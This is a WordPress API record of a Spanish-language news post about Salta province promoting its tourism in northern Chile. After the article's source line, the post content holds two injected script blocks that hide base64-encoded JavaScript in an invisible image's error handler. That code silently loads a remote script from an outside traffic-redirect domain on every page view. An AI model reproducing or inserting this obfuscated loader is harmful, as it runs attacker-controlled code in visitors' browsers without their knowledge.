{"id":4704,"date":"2024-12-18T10:19:35","date_gmt":"2024-12-18T13:19:35","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4704"},"modified":"2025-08-13T23:43:17","modified_gmt":"2025-08-14T02:43:17","slug":"salta-fortalece-su-promocion-internacional-con-acciones-estrategicas-en-chile","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4704","title":{"rendered":"Salta fortalece su promoci\u00f3n internacional con acciones estrat\u00e9gicas en Chile"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-d0ff9e618ac7d0174dc6a4c251ffe88b\" style=\"background-color:#707070\"><em>Salta contin\u00faa afianz\u00e1ndose como un referente del turismo en el Norte argentino mediante un plan de promoci\u00f3n internacional del Ministerio de Turismo y Deportes, orientado a consolidar su posicionamiento en mercados claves de la regi\u00f3n.<\/em><\/h4>\n\n\n\n<p>Como parte de la agenda institucional, la delegaci\u00f3n estuvo presente en el 2\u00ba Encuentro Internacional de Turismo en Zonas Costeras 2024, un espacio de intercambio y cooperaci\u00f3n que busca fortalecer la integraci\u00f3n regional en materia tur\u00edstica. Asimismo, se realizaron acciones espec\u00edficas en Antofagasta y Calama, con el objetivo de generar v\u00ednculos estrat\u00e9gicos con actores locales.<\/p>\n\n\n\n<p>La representaci\u00f3n salte\u00f1a estuvo integrada por la directora ejecutiva del Inprotur Salta&nbsp;<strong>Mar\u00eda Eugenia Cornejo<\/strong>; junto a referentes institucionales y del sector empresarial, entre ellos Yenny Orlandi (presidenta de la C\u00e1mara de Turismo y Comercio San Lorenzo), Mariana Farjat (presidenta de la AHT Salta) y Josefina Morales (directora de Promoci\u00f3n y Log\u00edstica del Ente Turismo Salta).<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/15335-salta-fortalece-su-promocion-internacional-con-acciones-estrategicas-en-chile.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/15335-salta-fortalece-su-promocion-internacional-con-acciones-estrategicas-en-chile.webp\" alt=\"Salta fortalece su promoci\u00f3n internacional con acciones estrat\u00e9gicas en Chile.\" style=\"width:353px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p>\u201cChile es un mercado prioritario para Salta, no solo por el flujo de visitantes que recibe la provincia, sino tambi\u00e9n por las oportunidades de crecimiento y cooperaci\u00f3n que representa. Nuestra participaci\u00f3n en este tipo de encuentros refuerza el compromiso institucional de posicionar a Salta como un destino l\u00edder en la regi\u00f3n, trabajando de manera articulada con el sector privado\u201d, destac\u00f3 Mar\u00eda Eugenia Cornejo.<\/p>\n\n\n\n<p>El plan de promoci\u00f3n internacional de Salta es resultado de un trabajo colaborativo que involucra a instituciones p\u00fablicas y privadas. Esta visi\u00f3n estrat\u00e9gica permite optimizar recursos y alcanzar objetivos comunes, fortaleciendo la competitividad de la provincia en un contexto global.<\/p>\n\n\n\n<p>En esta ocasi\u00f3n, la delegaci\u00f3n salte\u00f1a busca no solo atraer visitantes, sino tambi\u00e9n establecer alianzas con operadores tur\u00edsticos, empresas y entidades gubernamentales de Chile. Las actividades incluyen la difusi\u00f3n de informaci\u00f3n institucional sobre Salta, el desarrollo de encuentros bilaterales y la generaci\u00f3n de espacios de intercambio que promuevan el conocimiento mutuo y la cooperaci\u00f3n regional.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/15336-salta-fortalece-su-promocion-internacional-con-acciones-estrategicas-en-chile.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/15336-salta-fortalece-su-promocion-internacional-con-acciones-estrategicas-en-chile.webp\" alt=\"Salta fortalece su promoci\u00f3n internacional con acciones estrat\u00e9gicas en Chile.\" style=\"width:308px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p>A trav\u00e9s de estas acciones, Salta refuerza su compromiso de consolidar su posicionamiento internacional, destac\u00e1ndose como una provincia que apuesta por la innovaci\u00f3n en su modelo de gesti\u00f3n tur\u00edstica, basado en la planificaci\u00f3n estrat\u00e9gica, la articulaci\u00f3n institucional y el fortalecimiento de sus v\u00ednculos en el mercado internacional.<\/p>\n\n\n\n<p>La oferta tur\u00edstica de Salta brill\u00f3 en el Norte chileno. Desde rafting por aguas turbulentas, cabalgatas en m\u00e9danos, un trekking por encima de las nubes y paseos en bicicleta transitando infinidad de paisajes, son algunas de las opciones para disfrutar de la naturaleza y la aventura.<\/p>\n\n\n\n<p>Las pe\u00f1as, restaurantes y bares se destacan por la m\u00fasica folkl\u00f3rica. Las pe\u00f1as de Salta son una parte esencial de la rica cultura y tradiciones musicales de esta provincia. Estos encuentros organizados por los municipios, fueron parte de lo que Salta ofreci\u00f3 a los visitantes de esta regi\u00f3n del continente.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Salta contin\u00faa afianz\u00e1ndose como un referente del turismo en el Norte argentino mediante un plan de promoci\u00f3n internacional del Ministerio de Turismo y Deportes, orientado a consolidar su posicionamiento en mercados claves de la regi\u00f3n. Como parte de la agenda institucional, la delegaci\u00f3n estuvo presente en el 2\u00ba Encuentro Internacional de Turismo en Zonas Costeras [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4705,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[22,18],"tags":[],"class_list":{"0":"post-4704","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-internacional","8":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4704"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4704"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4704\/revisions"}],"predecessor-version":[{"id":6607,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4704\/revisions\/6607"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4705"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4704"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4704"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4704"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}